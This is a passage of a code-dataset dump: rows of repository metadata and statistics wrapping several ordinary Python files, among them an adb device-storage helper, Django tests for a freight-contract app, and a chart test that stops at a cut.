| 0
| 0.336492
| 0.07211
| 10,803
| 136
| 139
| 79.433824
| 0.416002
| 0.027678
| 0
| 0.038462
| 0
| 0.653846
| 0.770176
| 0.763506
| 0
| 1
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.048077
| 0
| 0.144231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
30537e2b0b4244c8cb40feb6dfa76b19de5de850
| 25
|
py
|
Python
|
omnilingual/features/__init__.py
|
DennisMerkus/pyomnilingual
|
a25efc221c37a44d86f3a41cbd1c2786cd6f09bb
|
[
"MIT"
] | null | null | null |
omnilingual/features/__init__.py
|
DennisMerkus/pyomnilingual
|
a25efc221c37a44d86f3a41cbd1c2786cd6f09bb
|
[
"MIT"
] | null | null | null |
omnilingual/features/__init__.py
|
DennisMerkus/pyomnilingual
|
a25efc221c37a44d86f3a41cbd1c2786cd6f09bb
|
[
"MIT"
] | null | null | null |
from .universal import *
| 12.5
| 24
| 0.76
| 3
| 25
| 6.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2322dce8bd0be2fc0605863a4b6eb052af63d781
| 9,641
|
py
|
Python
|
orchestrator/src/mobiletestorchestrator/device_storage.py
|
jrusnakli/mobile_test_orchestrator
|
9dc21ed22798fc7587db538ca0e0a69d5664d03d
|
[
"BSD-2-Clause"
] | 1
|
2019-05-21T15:14:39.000Z
|
2019-05-21T15:14:39.000Z
|
orchestrator/src/mobiletestorchestrator/device_storage.py
|
jrusnakli/mobile_test_orchestrator
|
9dc21ed22798fc7587db538ca0e0a69d5664d03d
|
[
"BSD-2-Clause"
] | 17
|
2019-05-20T17:40:05.000Z
|
2021-07-25T23:13:13.000Z
|
orchestrator/src/mobiletestorchestrator/device_storage.py
|
jrusnakli/mobile_test_orchestrator
|
9dc21ed22798fc7587db538ca0e0a69d5664d03d
|
[
"BSD-2-Clause"
] | 7
|
2019-05-22T21:02:10.000Z
|
2020-08-06T23:56:23.000Z
|
"""
The *devicestorage* package provides the API for working with a devices (sdcard) storage
"""
import logging
import os
import subprocess
from typing import Optional, List, AsyncIterable
from .device import (
Device,
RemoteDeviceBased,
)
__all__ = ["DeviceStorage", "AsyncDeviceStorage"]
log = logging.getLogger(__name__)
class DeviceStorage(RemoteDeviceBased):
"""
Class providing API to push, install and remove files and apps to a remote device
:param device: which device
Class providing API to push, push and pull files to a remote device
"""
ERROR_MSG_INSUFFICIENT_STORAGE = "INSTALL_FAILED_INSUFFICIENT_STORAGE"
def __init__(self, device: Device):
super(DeviceStorage, self).__init__(device)
self._ext_storage = None
@property
def external_storage_location(self) -> str:
"""
:return: location on remote device of external storage
"""
return self.device.external_storage_location
def list(self, remote_path: str) -> List[str]:
"""
list the files at the given path (which can be a filename pattern)
:param remote_path: path or pattern to match
:return: List of files found, empty if no files found
"""
try:
proc = self.device.execute_remote_cmd("shell", "ls", remote_path, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except Device.CommandExecutionFailure:
return []
return proc.stdout.split()
def push(self, local_path: str, remote_path: str) -> None:
"""
Push a local file to the given location on the remote device.
NOTE: pushing to an app's data directory is not possible and leads to
a permission-denied response even when using "run-as"
:param local_path: path to local host file
:param remote_path: path to place file on the remote device
:raises FileNotFoundError: if provide local path does not exist and is a file
:raises Exception: if command to push file failed
:raises `Device.CommandExecutionFailure`: if command to push file failed
"""
# NOTE: pushing to an app's data directory is not possible and leads to
# a permission-denied response even when using "run-as"
if not os.path.isfile(local_path):
raise FileNotFoundError("No such file found: %s" % local_path)
self.device.execute_remote_cmd('push', local_path, remote_path)
def pull(self, remote_path: str, local_path: str, run_as: Optional[str] = None) -> None:
"""
Pull a file from device
:param remote_path: location on phone to pull file from
:param local_path: path to file to be created from content from device
:param run_as: user to run command under on remote device, or None
:raises FileExistsError: if the locat path already exists
:raises `Device.CommandExecutionFailure`: if command to pull file failed
"""
if os.path.exists(local_path):
log.warning("File %s already exists when pulling. Potential to overwrite files.", local_path)
if run_as:
with open(local_path, 'w') as out:
self.device.execute_remote_cmd('shell', 'run-as', run_as, 'cat', remote_path, stdout=out)
else:
self.device.execute_remote_cmd('pull', remote_path, local_path)
def make_dir(self, path: str, run_as: Optional[str] = None) -> None:
"""
make a directory on remote device
:param path: path to create
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailure`: on failure to create directory
"""
if run_as:
self.device.execute_remote_cmd("shell", "run-as", run_as, "mkdir", "-p", path,
timeout=Device.TIMEOUT_ADB_CMD)
else:
self.device.execute_remote_cmd("shell", "mkdir", "-p", path)
def remove(self, path: str, recursive: bool = False, run_as: Optional[str] = None) -> None:
"""
remove a file or directory from remote device
:param path: path to remove
:param recursive: if True and path is directory, recursively remove all contents otherwise will raise
`Device.CommandExecutionFailure` exception
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailureException`: on failure to remote specified path
"""
cmd = ["shell", "run-as", run_as, "rm"] if run_as else ["shell", "rm"]
if recursive:
cmd.append("-r")
cmd.append(path)
self.device.execute_remote_cmd(*cmd, timeout=Device.TIMEOUT_LONG_ADB_CMD)
class AsyncDeviceStorage(RemoteDeviceBased):
"""
Class providing API to push, install and remove files and apps to a remote device
:param device: which device
Class providing API to push, push and pull files to a remote device
"""
ERROR_MSG_INSUFFICIENT_STORAGE = "INSTALL_FAILED_INSUFFICIENT_STORAGE"
def __init__(self, device: Device):
super(AsyncDeviceStorage, self).__init__(device)
self._ext_storage = None
@property
def external_storage_location(self) -> str:
"""
:return: location on remote device of external storage
"""
return self.device.external_storage_location
async def list(self, remote_path: str, timeout: float = Device.TIMEOUT_ADB_CMD) -> AsyncIterable[str]:
"""
list the files at the given path (which can be a filename pattern)
:param remote_path: path or pattern to match
:return: List of files found, empty if no files found
"""
async with self.device.monitor_remote_cmd("shell", "ls", remote_path, include_stderr=False) as proc:
async for line in proc.output(unresponsive_timeout=timeout):
yield line
async def push(self, local_path: str, remote_path: str,
timeout: Optional[float]=Device.TIMEOUT_LONG_ADB_CMD) -> None:
"""
Push a local file to the given location on the remote device.
NOTE: pushing to an app's data directory is not possible and leads to
a permission-denied response even when using "run-as"
:param local_path: path to local host file
:param remote_path: path to place file on the remote device
:param timeout: raise timeout error if too long to eecute
:raises FileNotFoundError: if provide local path does not exist and is a file
:raises `Device.CommandExecutionFailure`: if command to push file failed
:raises asynciot.TimeoutError: if timeout specified and command execution exceeds the timeout
"""
# NOTE: pushing to an app's data directory is not possible and leads to
# a permission-denied response even when using "run-as"
if not os.path.isfile(local_path):
raise FileNotFoundError("No such file found: %s" % local_path)
await self.device.execute_remote_cmd_async('push', local_path, remote_path, timeout=timeout)
async def pull(self, remote_path: str, local_path: str, run_as: Optional[str] = None) -> None:
"""
Pull a file from device
:param remote_path: location on phone to pull file from
:param local_path: path to file to be created from content from device
:param run_as: user to run command under on remote device, or None
:raises FileExistsError: if the locat path already exists
:raises `Device.CommandExecutionFailure`: if command to pull file failed
"""
if os.path.exists(local_path):
log.warning("File %s already exists when pulling. Potential to overwrite files.", local_path)
if run_as:
with open(local_path, 'w') as out:
await self.device.execute_remote_cmd_async ('shell', 'run-as', run_as, 'cat', remote_path, stdout=out)
else:
await self.device.execute_remote_cmd_async('pull', remote_path, local_path)
async def make_dir(self, path: str, run_as: Optional[str] = None) -> None:
"""
make a directory on remote device
:param path: path to create
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailure`: on failure to create directory
"""
if run_as:
await self.device.execute_remote_cmd_async("shell", "run-as", run_as, "mkdir", "-p", path,
timeout=Device.TIMEOUT_ADB_CMD)
else:
await self.device.execute_remote_cmd_async("shell", "mkdir", "-p", path)
async def remove(self, path: str, recursive: bool = False, run_as: Optional[str] = None) -> None:
"""
remove a file or directory from remote device
:param path: path to remove
:param recursive: if True and path is directory, recursively remove all contents otherwise will raise
`Device.CommandExecutionFailure` exception
:param run_as: user to run command under on remote device, or None
:raises `Device.CommandExecutionFailureException`: on failure to remote specified path
"""
cmd = ["shell", "run-as", run_as, "rm"] if run_as else ["shell", "rm"]
if recursive:
cmd.append("-r")
cmd.append(path)
await self.device.execute_remote_cmd_async(*cmd, timeout=Device.TIMEOUT_LONG_ADB_CMD)
| 42.471366
| 118
| 0.652629
| 1,264
| 9,641
| 4.845728
| 0.136076
| 0.027755
| 0.036082
| 0.048816
| 0.870694
| 0.851918
| 0.81502
| 0.799184
| 0.774857
| 0.74449
| 0
| 0
| 0.265221
| 9,641
| 227
| 119
| 42.471366
| 0.864625
| 0.248729
| 0
| 0.465116
| 0
| 0
| 0.090834
| 0.014418
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104651
| false
| 0
| 0.05814
| 0
| 0.255814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
234ccefa35c05191bcd78fef94da43c0c671994b
| 41
|
py
|
Python
|
torch_geometric/nn/acts.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 12,651
|
2017-10-28T15:14:24.000Z
|
2021-09-12T07:22:57.000Z
|
torch_geometric/nn/acts.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,472
|
2017-10-30T23:38:47.000Z
|
2021-09-12T06:41:44.000Z
|
torch_geometric/nn/acts.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,363
|
2017-12-01T13:25:05.000Z
|
2021-09-12T07:23:09.000Z
|
def swish(x):
return x * x.sigmoid()
| 13.666667
| 26
| 0.585366
| 7
| 41
| 3.428571
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.243902
| 41
| 2
| 27
| 20.5
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
2378c2549b75db43ae021635396faa3ea5a53876
| 53
|
py
|
Python
|
config.py
|
a-rozhkov/miprimer
|
04c6e7a3edc3bbc7f326513b9c057bf9b369ca2c
|
[
"MIT"
] | 15
|
2017-01-19T15:46:14.000Z
|
2020-05-17T09:40:14.000Z
|
config.py
|
a-rozhkov/miprimer
|
04c6e7a3edc3bbc7f326513b9c057bf9b369ca2c
|
[
"MIT"
] | null | null | null |
config.py
|
a-rozhkov/miprimer
|
04c6e7a3edc3bbc7f326513b9c057bf9b369ca2c
|
[
"MIT"
] | 1
|
2019-10-13T02:53:22.000Z
|
2019-10-13T02:53:22.000Z
|
config = {
'HOST': '0.0.0.0',
'PORT': 4242
}
| 10.6
| 22
| 0.415094
| 8
| 53
| 2.75
| 0.625
| 0.272727
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 0.301887
| 53
| 4
| 23
| 13.25
| 0.378378
| 0
| 0
| 0
| 0
| 0
| 0.283019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
88c6c1ed48822dd48efcb3dab58885ca39b34b48
| 19,920
|
py
|
Python
|
freight/tests/test_views.py
|
buahaha/aa-freight
|
69eb85188988d7cfaffc7c485d22ddb442a4a2b3
|
[
"MIT"
] | null | null | null |
freight/tests/test_views.py
|
buahaha/aa-freight
|
69eb85188988d7cfaffc7c485d22ddb442a4a2b3
|
[
"MIT"
] | null | null | null |
freight/tests/test_views.py
|
buahaha/aa-freight
|
69eb85188988d7cfaffc7c485d22ddb442a4a2b3
|
[
"MIT"
] | null | null | null |
import json
from unittest.mock import Mock, patch
from django.contrib.sessions.middleware import SessionMiddleware
from django.test import RequestFactory, TestCase
from django.urls import reverse
from esi.models import Token
from allianceauth.eveonline.models import EveCharacter
from allianceauth.tests.auth_utils import AuthUtils
from app_utils.testing import NoSocketsTestCase
from .. import views
from ..app_settings import (
FREIGHT_OPERATION_MODE_MY_ALLIANCE,
FREIGHT_OPERATION_MODE_MY_CORPORATION,
)
from ..models import Contract, ContractHandler, Location, Pricing
from . import DisconnectPricingSaveHandler, generate_token, store_as_Token
from .testdata import create_contract_handler_w_contracts
MODULE_PATH = "freight.views"
HTTP_OK = 200
HTTP_REDIRECT = 302
def response_content_to_str(content) -> str:
return content.decode("utf-8")
def json_response_to_python(response) -> object:
return json.loads(response_content_to_str(response.content))
def json_response_to_python_dict(response) -> dict:
return {x["id"]: x for x in json_response_to_python(response)}
class TestCalculator(NoSocketsTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts()
AuthUtils.add_permission_to_user_by_name("freight.use_calculator", cls.user)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
def test_index(self):
request = self.factory.get(reverse("freight:index"))
request.user = self.user
response = views.index(request)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:calculator"))
def test_calculator_access_with_permission(self):
request = self.factory.get(reverse("freight:calculator"))
request.user = self.user
response = views.calculator(request)
self.assertEqual(response.status_code, HTTP_OK)
def test_calculator_no_access_without_permission(self):
request = self.factory.get(reverse("freight:calculator"))
request.user = AuthUtils.create_user("Lex Luthor")
response = views.calculator(request)
self.assertNotEqual(response.status_code, HTTP_OK)
class TestContractList(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user_1 = create_contract_handler_w_contracts()
AuthUtils.add_permission_to_user_by_name("freight.basic_access", cls.user_1)
AuthUtils.add_permission_to_user_by_name("freight.use_calculator", cls.user_1)
AuthUtils.add_permission_to_user_by_name("freight.view_contracts", cls.user_1)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
cls.user_2 = AuthUtils.create_user("Lex Luthor")
AuthUtils.add_permission_to_user_by_name("freight.basic_access", cls.user_2)
def test_all_no_access_without_permission(self):
request = self.factory.get(reverse("freight:contract_list_all"))
request.user = self.user_2
response = views.contract_list_all(request)
self.assertNotEqual(response.status_code, HTTP_OK)
def test_should_return_all_contracts(self):
# given
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ALL})
)
request.user = self.user_1
# when
response = views.contract_list_data(request, views.CONTRACT_LIST_ALL)
# then
all_contract_ids = set(Contract.objects.values_list("contract_id", flat=True))
contract_ids_in_response = {
obj["contract_id"] for obj in json_response_to_python(response)
}
self.assertSetEqual(contract_ids_in_response, all_contract_ids)
# TODO
""" issue with setting permission
def test_active_access_with_permission(self):
request = self.factory.get(reverse('freight:contract_list_active'))
request.user = self.user_1
response = views.contract_list_active(request)
self.assertEqual(response.status_code, HTTP_OK)
"""
def test_active_data_has_all_contracts(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ACTIVE})
)
request.user = self.user_1
response = views.contract_list_data(request, views.CONTRACT_LIST_ACTIVE)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
contract_ids = {x["contract_id"] for x in data}
self.assertSetEqual(
contract_ids,
{
149409005,
149409014,
149409006,
149409015,
149409016,
149409064,
149409061,
149409062,
149409063,
149409017,
149409018,
149409019,
},
)
def test_data_invalid_category(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={"this_is_not_valid"})
)
request.user = self.user_1
with self.assertRaises(ValueError):
views.contract_list_data(request, "this_is_not_valid")
def test_user_no_access_without_permission(self):
request = self.factory.get(reverse("freight:contract_list_user"))
request.user = self.user_2
response = views.contract_list_user(request)
self.assertNotEqual(response.status_code, HTTP_OK)
def test_user_access_with_permission(self):
request = self.factory.get(reverse("freight:contract_list_user"))
request.user = self.user_1
response = views.contract_list_user(request)
self.assertEqual(response.status_code, HTTP_OK)
def test_data_user_no_access_without_permission_1(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_USER})
)
request.user = self.user_2
response = views.contract_list_data(request, views.CONTRACT_LIST_USER)
data = json_response_to_python(response)
self.assertListEqual(data, [])
def test_data_user_no_access_without_permission_2(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ACTIVE})
)
request.user = self.user_2
response = views.contract_list_data(request, views.CONTRACT_LIST_ACTIVE)
data = json_response_to_python(response)
self.assertListEqual(data, [])
def test_data_user_no_access_without_permission_3(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ALL})
)
request.user = self.user_2
response = views.contract_list_data(request, views.CONTRACT_LIST_ALL)
data = json_response_to_python(response)
self.assertListEqual(data, [])
def test_data_user(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_USER})
)
request.user = self.user_1
response = views.contract_list_data(request, views.CONTRACT_LIST_USER)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
contract_ids = {x["contract_id"] for x in data}
self.assertSetEqual(
contract_ids,
{
149409016,
149409061,
149409062,
149409063,
149409064,
},
)
class TestSetupContractHandler(NoSocketsTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts([])
AuthUtils.add_permission_to_user_by_name(
"freight.setup_contract_handler", cls.user
)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_normal(self, mock_run_contracts_sync, mock_message_plus):
ContractHandler.objects.all().delete()
token = Mock(spec=Token)
token.character_id = self.user.profile.main_character.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_run_contracts_sync.delay.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_error_no_alliance_member(self, mock_run_contracts_sync, mock_message_plus):
ContractHandler.objects.all().delete()
token = Mock(spec=Token)
token_char = EveCharacter.objects.get(character_id=90000005)
token.character_id = token_char.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_message_plus.error.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
@patch(
MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_CORPORATION
)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_error_character_not_owned(
self, mock_run_contracts_sync, mock_message_plus
):
ContractHandler.objects.all().delete()
token = Mock(spec=Token)
token_char = EveCharacter.objects.get(character_id=90000005)
token.character_id = token_char.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_message_plus.error.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
@patch(
MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_CORPORATION
)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_error_wrong_operation_mode(
self, mock_run_contracts_sync, mock_message_plus
):
token = Mock(spec=Token)
token.character_id = self.user.profile.main_character.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_message_plus.error.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
class TestStatistics(NoSocketsTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts()
# expected contracts to load: 149409118, 149409218, 149409318
cls.user = AuthUtils.add_permission_to_user_by_name(
"freight.basic_access", cls.user
)
cls.user = AuthUtils.add_permission_to_user_by_name(
"freight.view_statistics", cls.user
)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
def test_statistics_routes_data(self):
request = self.factory.get(reverse("freight:statistics_routes_data"))
request.user = self.user
response = views.statistics_routes_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"contracts": 3,
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"pilots": 1,
"name": "Jita <-> Amamake",
"customers": 1,
}
],
)
def test_statistics_pilots_data(self):
request = self.factory.get(reverse("freight:statistics_pilots_data"))
request.user = self.user
response = views.statistics_pilots_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"corporation": "Wayne Enterprise",
"contracts": 3,
"name": "Bruce Wayne",
}
],
)
def test_statistics_pilot_corporations_data(self):
request = self.factory.get(
reverse("freight:statistics_pilot_corporations_data")
)
request.user = self.user
response = views.statistics_pilot_corporations_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"name": "Wayne Enterprise",
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"alliance": "",
"contracts": 3,
}
],
)
def test_statistics_customer_data(self):
request = self.factory.get(reverse("freight:statistics_customer_data"))
request.user = self.user
response = views.statistics_customer_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"corporation": "Wayne Enterprise",
"contracts": 3,
"name": "Robin",
}
],
)
class TestAddLocation(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts([])
cls.factory = RequestFactory()
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".Location.objects.update_or_create_from_esi", autospec=True)
def test_normal(self, mock_update_or_create_from_esi, mock_message_plus):
location_id = 1022167642188
location = Location.objects.get(id=location_id)
mock_update_or_create_from_esi.return_value = location, False
my_character = self.user.profile.main_character
token = store_as_Token(
generate_token(
character_id=my_character.character_id,
character_name=my_character.character_name,
scopes=["publicData"],
),
self.user,
)
request = self.factory.post(
reverse("freight:add_location_2"), data={"location_id": location_id}
)
request.user = self.user
middleware = SessionMiddleware()
middleware.process_request(request)
request.session[views.ADD_LOCATION_TOKEN_TAG] = token.pk
request.session.save()
orig_view = views.add_location_2.__wrapped__.__wrapped__
response = orig_view(request)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:add_location_2"))
self.assertEqual(mock_message_plus.success.call_count, 1)
self.assertEqual(mock_message_plus.error.call_count, 0)
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".Location.objects.update_or_create_from_esi", autospec=True)
def test_fetching_location_fails(
self, mock_update_or_create_from_esi, mock_message_plus
):
location_id = 1022167642188
Location.objects.get(id=location_id)
mock_update_or_create_from_esi.side_effect = RuntimeError("Test exception")
my_character = self.user.profile.main_character
token = store_as_Token(
generate_token(
character_id=my_character.character_id,
character_name=my_character.character_name,
scopes=["publicData"],
),
self.user,
)
request = self.factory.post(
reverse("freight:add_location_2"), data={"location_id": location_id}
)
request.user = self.user
middleware = SessionMiddleware()
middleware.process_request(request)
request.session[views.ADD_LOCATION_TOKEN_TAG] = token.pk
request.session.save()
orig_view = views.add_location_2.__wrapped__.__wrapped__
response = orig_view(request)
self.assertEqual(response.status_code, HTTP_OK)
self.assertEqual(mock_message_plus.success.call_count, 0)
self.assertEqual(mock_message_plus.error.call_count, 1)
| 38.015267
| 88
| 0.65497
| 2,157
| 19,920
| 5.712564
| 0.10663
| 0.03303
| 0.035059
| 0.035465
| 0.849132
| 0.821052
| 0.811557
| 0.798653
| 0.762701
| 0.735919
| 0
| 0.033354
| 0.253464
| 19,920
| 523
| 89
| 38.087954
| 0.795239
| 0.004016
| 0
| 0.635945
| 0
| 0
| 0.089959
| 0.052357
| 0
| 0
| 0
| 0.001912
| 0.099078
| 1
| 0.071429
| false
| 0
| 0.032258
| 0.006912
| 0.12212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
88fa5a18c93ed69587f13fb808c922fb9fa883c7
| 2,740
|
py
|
Python
|
nostradamus/tests/analysis_and_training_tests/test_defect_submission.py
|
exactpro/nostradamus
|
80df847a012374ad2b702cc9f9c9cb46c1153ee7
|
[
"Apache-2.0"
] | 25
|
2019-12-18T05:32:41.000Z
|
2022-03-23T12:16:49.000Z
|
nostradamus/tests/analysis_and_training_tests/test_defect_submission.py
|
Exactpro/nostradamus
|
80df847a012374ad2b702cc9f9c9cb46c1153ee7
|
[
"Apache-2.0"
] | 12
|
2018-12-24T14:56:50.000Z
|
2019-11-29T16:53:49.000Z
|
nostradamus/tests/analysis_and_training_tests/test_defect_submission.py
|
exactpro/nostradamus
|
80df847a012374ad2b702cc9f9c9cb46c1153ee7
|
[
"Apache-2.0"
] | 7
|
2019-12-18T05:32:43.000Z
|
2021-08-18T05:27:04.000Z
|
from pandas import DataFrame
from apps.analysis_and_training.main.charts import get_defect_submission
def test_submission_chart_by_day(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%d.%m.%Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Day")["created_line"]
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_week(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%d.%m.%Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Week")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_month(dates: DataFrame):
bugs = dates.set_index("Created")
